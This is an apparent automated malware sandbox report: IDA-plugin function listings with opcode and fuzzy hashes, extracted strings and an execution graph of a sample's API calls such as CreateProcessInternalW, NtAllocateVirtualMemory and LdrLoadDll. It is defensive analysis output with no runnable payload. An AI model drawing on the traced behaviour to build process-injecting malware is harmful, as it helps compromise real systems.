                                                          • Opcode ID: 0c9ae20bbf7d28002097368b2745013456a803fa7e5a7aa848e8f5b8a8e98eff
                                                          • Instruction ID: 60c510a6c771a49930e5aad1934e5fba3c85bef222291b52f3114d0d1d8dac3c
                                                          • Opcode Fuzzy Hash: 0c9ae20bbf7d28002097368b2745013456a803fa7e5a7aa848e8f5b8a8e98eff
                                                          • Instruction Fuzzy Hash: 65E04F326412142BC620A6999C05FDBB75D8BD5E61F050076FE09AB340EAB4AA0186E4
                                                          Function 029394D1 Relevance: .0, Instructions: 28COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.3925224041.0000000002640000.00000040.00000001.00040000.00000000.sdmp, Offset: 02640000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_2640000_vEErKBMCpBGs.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 031a64e66d3a0a6018d0005e5181440eaf49b662aee38cd8967d16bbceb66496
                                                          • Instruction ID: 2a9c3f56f0bd5d81cc7206cf803e72045ab48a3dd6d23da726c75c7bc6cec9fe
                                                          • Opcode Fuzzy Hash: 031a64e66d3a0a6018d0005e5181440eaf49b662aee38cd8967d16bbceb66496
                                                          • Instruction Fuzzy Hash: 6EF06571D19108AAEB14DF68D881FDEBBA4EF05360F10436DE819DB280E6758754CB41
                                                          Function 0294A8F4 Relevance: .0, Instructions: 25COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.3925224041.0000000002640000.00000040.00000001.00040000.00000000.sdmp, Offset: 02640000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_2640000_vEErKBMCpBGs.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1ccfb7074c235d79d87762803b7bffdee7b431a73409e616f994fa16c9a62f17
                                                          • Instruction ID: 3dfadeca7206f6714d015b872239d63750ee3f4f0ba40e6d0e42bcee352ad997
                                                          • Opcode Fuzzy Hash: 1ccfb7074c235d79d87762803b7bffdee7b431a73409e616f994fa16c9a62f17
                                                          • Instruction Fuzzy Hash: A0E046362002587BC620EB59EC00FEBB7ADEBC5724F008419FA08A7245CA70BA018BA0
                                                          Function 0292C0FC Relevance: .0, Instructions: 13COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.3925224041.0000000002640000.00000040.00000001.00040000.00000000.sdmp, Offset: 02640000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_2640000_vEErKBMCpBGs.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b0b7c1bceb3c0f31676697ff2d801e98acaef1cacf05347acc21371b6210d5b6
                                                          • Instruction ID: 92e7201497057805914f034b2c687916fee8fd61c60ab7e4d302cae1a3469b40
                                                          • Opcode Fuzzy Hash: b0b7c1bceb3c0f31676697ff2d801e98acaef1cacf05347acc21371b6210d5b6
                                                          • Instruction Fuzzy Hash: FEC01232105052DA8B02BB21878025BBB62EED32183B81A82C4821ED6BA77218A8CA40
                                                          Function 0294C9E4 Relevance: .0, Instructions: 13COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.3925224041.0000000002640000.00000040.00000001.00040000.00000000.sdmp, Offset: 02640000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_2640000_vEErKBMCpBGs.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a8ae1296a3139b760b04d02c2dc331ea853c858c75bcffd6f7a9f22bce46367e
                                                          • Instruction ID: 3e3fff0c0033a61f213e1fe049dea87d17fa7eccf6f1e80ddac718cb87c38bb6
                                                          • Opcode Fuzzy Hash: a8ae1296a3139b760b04d02c2dc331ea853c858c75bcffd6f7a9f22bce46367e
                                                          • Instruction Fuzzy Hash: A9C080715403087FD740EB8CCC85F6533DC9748A10F004050BA0C8B341D974FB508754

                                                          Non-executed Functions

                                                          Function 02943DA4 Relevance: 34.0, Strings: 27, Instructions: 264COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.3925224041.0000000002640000.00000040.00000001.00040000.00000000.sdmp, Offset: 02640000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_2640000_vEErKBMCpBGs.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                                                          • API String ID: 0-1002149817
                                                          • Opcode ID: 915587c63906c7f028a4648f15c33dc055c96a600cbdf6225bd1b9e8e1f1076a
                                                          • Instruction ID: 2798e9caa83fcd7088893e7cb96caa05d191663f5b9c0e456f8457819a481798
                                                          • Opcode Fuzzy Hash: 915587c63906c7f028a4648f15c33dc055c96a600cbdf6225bd1b9e8e1f1076a
                                                          • Instruction Fuzzy Hash: 69C13EB1D012689EDF21DFA4CD44BEEBBB9AF49304F0081D9D50CA7241E7B55A88CFA5
                                                          Function 0293C394 Relevance: 16.4, Strings: 13, Instructions: 194COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.3925224041.0000000002640000.00000040.00000001.00040000.00000000.sdmp, Offset: 02640000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_2640000_vEErKBMCpBGs.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                          • API String ID: 0-392141074
                                                          • Opcode ID: 070ab7f66e8d9c04ed6f4c8a2de89e5a9f8ed64d5bacfa885cc3545c8b1cb9dc
                                                          • Instruction ID: 8d27d06a6fed759cf650a37cd954047335bb7875cb3828dd275b7e9676e6afae
                                                          • Opcode Fuzzy Hash: 070ab7f66e8d9c04ed6f4c8a2de89e5a9f8ed64d5bacfa885cc3545c8b1cb9dc
                                                          • Instruction Fuzzy Hash: 0F710DB1C01318AFDB65DBA4CC40FDEB77DAF48704F40459AA50CAA180EF756B888FA5
                                                          Function 0292FF9B Relevance: 13.8, Strings: 11, Instructions: 87COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.3925224041.0000000002640000.00000040.00000001.00040000.00000000.sdmp, Offset: 02640000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_2640000_vEErKBMCpBGs.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                          • API String ID: 0-685823316
                                                          • Opcode ID: 5bd7519a139b4a50a57840ebba9e22ae570f8fa15fabef404c282f35a4f17931
                                                          • Instruction ID: 71e6b8ab85d23ea01284feef755b340899d0df3a21783c23cbf80d2c02c8accc
                                                          • Opcode Fuzzy Hash: 5bd7519a139b4a50a57840ebba9e22ae570f8fa15fabef404c282f35a4f17931
                                                          • Instruction Fuzzy Hash: 753181B1D01318AAEF50DFA4CC45FEEBBB9AF48704F00815DE608BA180DBB55648CFA4
                                                          Function 02928564 Relevance: 11.3, Strings: 9, Instructions: 43COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.3925224041.0000000002640000.00000040.00000001.00040000.00000000.sdmp, Offset: 02640000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_2640000_vEErKBMCpBGs.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: /$1$4$:$I$`$f$o$w
                                                          • API String ID: 0-1316387851
                                                          • Opcode ID: 5fdf2e1f0c595c975885bb03b8af4b2d974eecc27c6b2146ce322064a0e1b817
                                                          • Instruction ID: c6560f6b95ae3aa49c292d42eb883e5b85f70a79170b3905663338758a87aa4a
                                                          • Opcode Fuzzy Hash: 5fdf2e1f0c595c975885bb03b8af4b2d974eecc27c6b2146ce322064a0e1b817
                                                          • Instruction Fuzzy Hash: 1011DE20D082CED9DB12D7AC84087AEBF765F12214F0882D9D4A12B2C2C27A435AD7B6
                                                          Function 029374B0 Relevance: 10.1, Strings: 8, Instructions: 133COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.3925224041.0000000002640000.00000040.00000001.00040000.00000000.sdmp, Offset: 02640000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_2640000_vEErKBMCpBGs.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: .$P$e$i$m$o$r$x
                                                          • API String ID: 0-620024284
                                                          • Opcode ID: d576e4f64ceb7dc0a8dd4c651bb2eb6c1b46a7925b4662369aa255dcfd2430a0
                                                          • Instruction ID: fb886dc967fe21df222c1c96820f083ab513b3fa43ecb1c50f52654dad369efa
                                                          • Opcode Fuzzy Hash: d576e4f64ceb7dc0a8dd4c651bb2eb6c1b46a7925b4662369aa255dcfd2430a0
                                                          • Instruction Fuzzy Hash: 974164B5C00218BBEB25EFA0DC41FDE737DAF94700F40859AA50DA7141EAB597498FA1
                                                          Function 02944604 Relevance: 8.9, Strings: 7, Instructions: 119COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.3925224041.0000000002640000.00000040.00000001.00040000.00000000.sdmp, Offset: 02640000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_2640000_vEErKBMCpBGs.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: L$S$\$a$c$e$l
                                                          • API String ID: 0-3322591375
                                                          • Opcode ID: e995b83fcc5aa68ad0641f569ad60878e0e6fcea569a247ac4a8b2c60f0f6793
                                                          • Instruction ID: db05a430c9df37c21b55421dcf9625af3c0143171521e6210fb50ac4d22b1e92
                                                          • Opcode Fuzzy Hash: e995b83fcc5aa68ad0641f569ad60878e0e6fcea569a247ac4a8b2c60f0f6793
                                                          • Instruction Fuzzy Hash: D2415EB2C11218AEDB10DFA4DC84FEEB7F9BF88714F05456AD909A7200EB715A458F94
                                                          Function 0293C145 Relevance: 7.7, Strings: 6, Instructions: 176COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.3925224041.0000000002640000.00000040.00000001.00040000.00000000.sdmp, Offset: 02640000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_2640000_vEErKBMCpBGs.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: F$P$T$f$r$x
                                                          • API String ID: 0-2523166886
                                                          • Opcode ID: b025df41a15414d5f7e30c11d98cca6410156e77cc9190ce550bced86d5c401f
                                                          • Instruction ID: 0af2928198ad00134cf2f5a8258eacea0ab476888b836a790f2f0d88fc0aedb2
                                                          • Opcode Fuzzy Hash: b025df41a15414d5f7e30c11d98cca6410156e77cc9190ce550bced86d5c401f
                                                          • Instruction Fuzzy Hash: C651C271901705EEEB35DBB4CC44FAAB7BCFF44304F04465BA548A6180E7B4AA48CFA2
                                                          Function 0293B860 Relevance: 6.5, Strings: 5, Instructions: 202COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.3925224041.0000000002640000.00000040.00000001.00040000.00000000.sdmp, Offset: 02640000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_2640000_vEErKBMCpBGs.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $i$l$o$u
                                                          • API String ID: 0-2051669658
                                                          • Opcode ID: 2fd205580dcf7f8c8c7016bd0e118fbeaa212ccbfab26d771e887d06b5b5fb3d
                                                          • Instruction ID: 2ea3fd2e9b395bf8e6fca4807ed475e9d9649fb36b3d552602feb1cc35e9404b
                                                          • Opcode Fuzzy Hash: 2fd205580dcf7f8c8c7016bd0e118fbeaa212ccbfab26d771e887d06b5b5fb3d
                                                          • Instruction Fuzzy Hash: 1F614CB2900708AFDB25DBA4CC90FEFB7FDAB88704F108559E519E7240E775AA45CB60
                                                          Function 0293B864 Relevance: 6.4, Strings: 5, Instructions: 126COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.3925224041.0000000002640000.00000040.00000001.00040000.00000000.sdmp, Offset: 02640000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_2640000_vEErKBMCpBGs.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $i$l$o$u
                                                          • API String ID: 0-2051669658
                                                          • Opcode ID: a4fc214f41808c867938166f824e9b4fed141587d69b7567285a4812ab6c9e99
                                                          • Instruction ID: 5b84d31692e602a527ebac26e52a4a47f1d90335a2274795962730b5b6e9743b
                                                          • Opcode Fuzzy Hash: a4fc214f41808c867938166f824e9b4fed141587d69b7567285a4812ab6c9e99
                                                          • Instruction Fuzzy Hash: 884107B1900208AFDB25DFA4CC94FEFBBFDAB88704F104559E659A7240E770AA458B60
                                                          Function 0293B4F2 Relevance: 5.3, Strings: 4, Instructions: 301COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.3925224041.0000000002640000.00000040.00000001.00040000.00000000.sdmp, Offset: 02640000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_2640000_vEErKBMCpBGs.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $e$k$o
                                                          • API String ID: 0-3624523832
                                                          • Opcode ID: 5e904b6ee15b4b9249ca26bec108c4a3531f3bd144c4916552ea1044c1622a08
                                                          • Instruction ID: 68f58bc27e1c138e33b74917fe401945da5c45a4ce22843d6e20be539f4089c6
                                                          • Opcode Fuzzy Hash: 5e904b6ee15b4b9249ca26bec108c4a3531f3bd144c4916552ea1044c1622a08
                                                          • Instruction Fuzzy Hash: F5B118B5A00308AFDB25CBA4CC94FEFB7BDAF88704F108559F619A7240D775AA41CB60
                                                          Function 0293BE1E Relevance: 5.2, Strings: 4, Instructions: 239COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.3925224041.0000000002640000.00000040.00000001.00040000.00000000.sdmp, Offset: 02640000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_2640000_vEErKBMCpBGs.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $e$h$o
                                                          • API String ID: 0-3662636641
                                                          • Opcode ID: b660e6b7d4b1ed6a2b0c7b580a94d450bbb92765de76104d58463560d32867e9
                                                          • Instruction ID: 078880c524d6470f5872c447a783b6b4bc185fc6b9b6ac0dabc4924ddaca21c3
                                                          • Opcode Fuzzy Hash: b660e6b7d4b1ed6a2b0c7b580a94d450bbb92765de76104d58463560d32867e9
                                                          • Instruction Fuzzy Hash: 448166B2C012586ADB65EB54CC85FEF73BDEF88300F00469AA50DA6150EF745B888FA5
                                                          Function 0293B4F4 Relevance: 5.2, Strings: 4, Instructions: 181COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.3925224041.0000000002640000.00000040.00000001.00040000.00000000.sdmp, Offset: 02640000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_2640000_vEErKBMCpBGs.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $e$k$o
                                                          • API String ID: 0-3624523832
                                                          • Opcode ID: 2fd32304c3ef6cb7a82ad657eb4c7366dda142afcf77b0006ea1593ce260534a
                                                          • Instruction ID: f8a957ec97c6887394d42c66b4202e939a28bba1029f88ea4c8435b97cc70300
                                                          • Opcode Fuzzy Hash: 2fd32304c3ef6cb7a82ad657eb4c7366dda142afcf77b0006ea1593ce260534a
                                                          • Instruction Fuzzy Hash: 57615DB5A00348AFDB25DFA4CC94FEFB7BDAF88704F108559E619A7244D731AA41CB60
                                                          Function 0293B3B3 Relevance: 5.1, Strings: 4, Instructions: 122COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.3925224041.0000000002640000.00000040.00000001.00040000.00000000.sdmp, Offset: 02640000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_2640000_vEErKBMCpBGs.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                          • API String ID: 0-2877786613
                                                          • Opcode ID: 45450a82271ba3d052c9166f3af1c262a13287d1a898f7e42005c6afadae15b4
                                                          • Instruction ID: 18aa1793067ca65ec5a9c2339987d3dd225d3469aea3a0fbf3df83b2c83ecef1
                                                          • Opcode Fuzzy Hash: 45450a82271ba3d052c9166f3af1c262a13287d1a898f7e42005c6afadae15b4
                                                          • Instruction Fuzzy Hash: 52413D719122587EEB11EBD0CC41FEF7B7DAF95704F00454AF604AA190DB785706CBA6
                                                          Function 0293B3B4 Relevance: 5.1, Strings: 4, Instructions: 120COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.3925224041.0000000002640000.00000040.00000001.00040000.00000000.sdmp, Offset: 02640000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_2640000_vEErKBMCpBGs.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                          • API String ID: 0-2877786613
                                                          • Opcode ID: 66e524b661507ba3bef2097c13bf02c4973fc2c64d34aeeb307e71b68f136dcf
                                                          • Instruction ID: f837282a302bffd6747ef1e12b01efb6b6ed25f4fa15987ab65d19bbb994c518
                                                          • Opcode Fuzzy Hash: 66e524b661507ba3bef2097c13bf02c4973fc2c64d34aeeb307e71b68f136dcf
                                                          • Instruction Fuzzy Hash: 5E310E719521587EEB11EBD0CC41FEF7B7DAF95704F00444AFA04AA190DB786A05CBB6
                                                          Function 0293BE24 Relevance: 5.1, Strings: 4, Instructions: 102COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.3925224041.0000000002640000.00000040.00000001.00040000.00000000.sdmp, Offset: 02640000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_2640000_vEErKBMCpBGs.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $e$h$o
                                                          • API String ID: 0-3662636641
                                                          • Opcode ID: 73ff9b5fccec621417d2c147cd1ac462ef81a97a1e5cfb657563ca13a14dae35
                                                          • Instruction ID: 4acdb685765dad45bc794a5a49cfe96bcf4b2341cff41ac0ed967abfb2ca726b
                                                          • Opcode Fuzzy Hash: 73ff9b5fccec621417d2c147cd1ac462ef81a97a1e5cfb657563ca13a14dae35
                                                          • Instruction Fuzzy Hash: D84141B1C01258AEDB50EBA4CC41FEEB3B9EF48700F4046DAA50DA6154EF745B88CFA5
                                                          Function 02937694 Relevance: 5.1, Strings: 4, Instructions: 89COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.3925224041.0000000002640000.00000040.00000001.00040000.00000000.sdmp, Offset: 02640000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_2640000_vEErKBMCpBGs.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 7$G$K$t
                                                          • API String ID: 0-1935247632
                                                          • Opcode ID: c96162170292c71e8470298acf7be25ebe17fe702fc4e108b2b52951027e04a7
                                                          • Instruction ID: d773b7f3344ff099ff135a1e9117a5e63f8a88b3e0dbc4ec8add3bcb44c8369a
                                                          • Opcode Fuzzy Hash: c96162170292c71e8470298acf7be25ebe17fe702fc4e108b2b52951027e04a7
                                                          • Instruction Fuzzy Hash: 843150B1910119BBEF14DBA4CC41FFEB7B9EF48308F004199E908A7240EB75AA048BE5
                                                          Function 02938AAF Relevance: 5.0, Strings: 4, Instructions: 49COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.3925224041.0000000002640000.00000040.00000001.00040000.00000000.sdmp, Offset: 02640000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_2640000_vEErKBMCpBGs.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $e$k$o
                                                          • API String ID: 0-3624523832
                                                          • Opcode ID: fe875d4f46ff4c6fbdd37e93ba187611f4f021ca6218b298dd0cd8ea7781120c
                                                          • Instruction ID: dea3f0c97f0d88c9cfbb9fea278bbbf5b8d6ecf05292d10a88c14440b1b7eb51
                                                          • Opcode Fuzzy Hash: fe875d4f46ff4c6fbdd37e93ba187611f4f021ca6218b298dd0cd8ea7781120c
                                                          • Instruction Fuzzy Hash: 691182B2900208AFDB14DF99D8C4EDEBBB9FF48314F04865AE919AB205D7719545CFA0
                                                          Function 02938AB4 Relevance: 5.0, Strings: 4, Instructions: 47COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.3925224041.0000000002640000.00000040.00000001.00040000.00000000.sdmp, Offset: 02640000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_2640000_vEErKBMCpBGs.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $e$k$o
                                                          • API String ID: 0-3624523832
                                                          • Opcode ID: c8dcd472c93be491c28914bba79a1b6c957f5ddb905f78957cbad4fc6862d5c5
                                                          • Instruction ID: cb1dc7425ddd15c1c0395e933702dced03152068f897464081f10fec2ed2eb94
                                                          • Opcode Fuzzy Hash: c8dcd472c93be491c28914bba79a1b6c957f5ddb905f78957cbad4fc6862d5c5
                                                          • Instruction Fuzzy Hash: 4B0184B2900218AFDB14DF99D884EDEF7B9FF48314F04861AE9196B201E771A545CFA0
                                                          Function 02924A1B Relevance: 5.0, Strings: 4, Instructions: 30COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.3925224041.0000000002640000.00000040.00000001.00040000.00000000.sdmp, Offset: 02640000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_2640000_vEErKBMCpBGs.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ($NDI\$ORAX$Z
                                                          • API String ID: 0-580376826
                                                          • Opcode ID: cba09048254eeb7f0f368994795b7c683c278a2b283cc14a166a9dd249642e1c
                                                          • Instruction ID: 6ebcb7a66c208788554328a99f0489b08e77b9e0d24a247b95b79b9a2345276f
                                                          • Opcode Fuzzy Hash: cba09048254eeb7f0f368994795b7c683c278a2b283cc14a166a9dd249642e1c
                                                          • Instruction Fuzzy Hash: F4F082B1901248AACB00DFE4C988BEEFF74FF45704F6150A9D9686B245D7719608CBB6

                                                          Execution Graph

                                                          Execution Coverage:2.5%
                                                          Dynamic/Decrypted Code Coverage:4.2%
                                                          Signature Coverage:1.5%
                                                          Total number of Nodes:456
                                                          Total number of Limit Nodes:77
                                                          execution_graph 101362 2739df0 101363 2739dff 101362->101363 101364 2739e40 101363->101364 101365 2739e2d CreateThread 101363->101365 101381 31c2ad0 LdrInitializeThunk 101382 2748b3b 101383 2748b45 101382->101383 101385 2748ab6 101383->101385 101386 2747400 101383->101386 101387 2747416 101386->101387 101389 274744f 101386->101389 101387->101389 101390 2747270 LdrLoadDll 101387->101390 101389->101385 101390->101389 101391 273b7e0 101394 275b8d0 101391->101394 101393 273ce51 101397 27599d0 101394->101397 101396 275b901 101396->101393 101398 2759a65 101397->101398 101400 27599fb 101397->101400 101399 2759a7b NtAllocateVirtualMemory 101398->101399 101399->101396 101400->101396 101401 2747660 101402 2747678 101401->101402 101404 27476d2 101401->101404 101402->101404 101405 274b5d0 101402->101405 101406 274b5f6 101405->101406 101407 274b829 101406->101407 101432 2759c70 101406->101432 101407->101404 101409 274b66c 101409->101407 101435 275cb30 101409->101435 101411 274b68b 101411->101407 101412 274b762 101411->101412 101441 2758ea0 101411->101441 101415 2745e80 LdrInitializeThunk 101412->101415 101416 274b781 101412->101416 101415->101416 101420 274b811 101416->101420 101452 2758a10 101416->101452 101417 274b74a 101448 2748450 101417->101448 101418 274b6f6 101418->101407 101418->101417 101419 274b728 101418->101419 101445 2745e80 101418->101445 101467 2754b20 LdrInitializeThunk 101419->101467 101426 2748450 LdrInitializeThunk 101420->101426 101427 274b81f 101426->101427 101427->101404 101428 274b7e8 101457 2758ac0 101428->101457 101430 274b802 101462 2758c20 101430->101462 101433 2759c8a 101432->101433 101434 2759c9b CreateProcessInternalW 101433->101434 101434->101409 101436 275caa0 101435->101436 101437 275cafd 101436->101437 101468 275ba40 101436->101468 101437->101411 101439 275cada 101471 275b960 101439->101471 101442 2758eba 101441->101442 101480 31c2c0a 101442->101480 101443 274b6ed 101443->101412 101443->101418 101447 2745ebe 101445->101447 101483 2759070 101445->101483 101447->101419 101449 2748463 101448->101449 101489 2758da0 101449->101489 101451 274848e 101451->101404 101453 2758a8d 101452->101453 101455 2758a3b 101452->101455 101495 31c39b0 LdrInitializeThunk 101453->101495 101454 2758ab2 101454->101428 101455->101428 101458 2758b40 101457->101458 101459 2758aee 101457->101459 101496 31c4340 LdrInitializeThunk 101458->101496 101459->101430 101460 2758b65 101460->101430 101463 2758ca0 101462->101463 101464 2758c4e 101462->101464 101497 31c2fb0 LdrInitializeThunk 101463->101497 101464->101420 101465 2758cc5 101465->101420 101467->101417 101474 2759b90 101468->101474 101470 275ba5b 101470->101439 101477 2759be0 101471->101477 101473 275b979 101473->101437 101475 2759baa 101474->101475 101476 2759bbb RtlAllocateHeap 101475->101476 101476->101470 101478 2759bfd 101477->101478 101479 2759c0e RtlFreeHeap 101478->101479 101479->101473 101481 31c2c1f LdrInitializeThunk 101480->101481 101482 31c2c11 101480->101482 101481->101443 101482->101443 101484 2759121 101483->101484 101486 275909f 101483->101486 101488 31c2d10 LdrInitializeThunk 101484->101488 101485 2759166 101485->101447 101486->101447 101488->101485 101490 2758e21 101489->101490 101492 2758dce 101489->101492 101494 31c2dd0 LdrInitializeThunk 101490->101494 101491 2758e46 101491->101451 101492->101451 101494->101491 101495->101454 101496->101460 101497->101465 101498 27410a0 101499 27410ba 101498->101499 101501 27410d8 101499->101501 101504 2744890 101499->101504 101502 274110c PostThreadMessageW 101501->101502 101503 274111d 101501->101503 101502->101503 101506 27448b4 101504->101506 101505 27448bb 101505->101501 101506->101505 101507 2744907 101506->101507 101508 27448f3 LdrLoadDll 101506->101508 101507->101501 101508->101507 101509 274fba0 101510 274fc04 101509->101510 101538 2746610 101510->101538 101512 274fd3e 101513 274fd37 101513->101512 101545 2746720 101513->101545 101515 274fee3 101516 274fdba 101516->101515 101517 274fef2 101516->101517 101549 274f980 101516->101549 101518 2759870 NtClose 101517->101518 101520 274fefc 101518->101520 101521 274fdf6 101521->101517 101522 274fe01 101521->101522 101523 275ba40 RtlAllocateHeap 101522->101523 101524 274fe2a 101523->101524 101525 274fe33 101524->101525 101526 274fe49 101524->101526 101527 2759870 NtClose 101525->101527 101558 274f870 CoInitialize 101526->101558 101529 274fe3d 101527->101529 101530 274fe57 101561 2759310 101530->101561 101532 274fed2 101565 2759870 101532->101565 101534 274fedc 101535 275b960 RtlFreeHeap 101534->101535 101535->101515 101536 274fe75 101536->101532 101537 2759310 LdrInitializeThunk 101536->101537 101537->101536 101539 2746643 101538->101539 101540 2746667 101539->101540 101568 27593c0 101539->101568 101540->101513 101542 274668a 101542->101540 101543 2759870 NtClose 101542->101543 101544 274670a 101543->101544 101544->101513 101546 2746745 101545->101546 101573 27591c0 101546->101573 101550 274f99c 101549->101550 101551 2744890 LdrLoadDll 101550->101551 101553 274f9ba 101551->101553 101552 274f9c3 101552->101521 101553->101552 101554 2744890 LdrLoadDll 101553->101554 101555 274fa8e 101554->101555 101556 2744890 LdrLoadDll 101555->101556 101557 274fae8 101555->101557 101556->101557 101557->101521 101560 274f8d5 101558->101560 101559 274f96b CoUninitialize 101559->101530 101560->101559 101562 275932d 101561->101562 101578 31c2ba0 LdrInitializeThunk 101562->101578 101563 275935d 101563->101536 101566 275988a 101565->101566 101567 275989b NtClose 101566->101567 101567->101534 101569 27593dd 101568->101569 101572 31c2ca0 LdrInitializeThunk 101569->101572 101570 2759409 101570->101542 101572->101570 101574 27591da 101573->101574 101577 31c2c60 LdrInitializeThunk 101574->101577 101575 27467b9 101575->101516 101577->101575 101578->101563 101579 275ca60 101580 275b960 RtlFreeHeap 101579->101580 101581 275ca75 101580->101581 101582 2751ea0 101586 2751eb9 101582->101586 101583 2751f46 101584 2751f01 101585 275b960 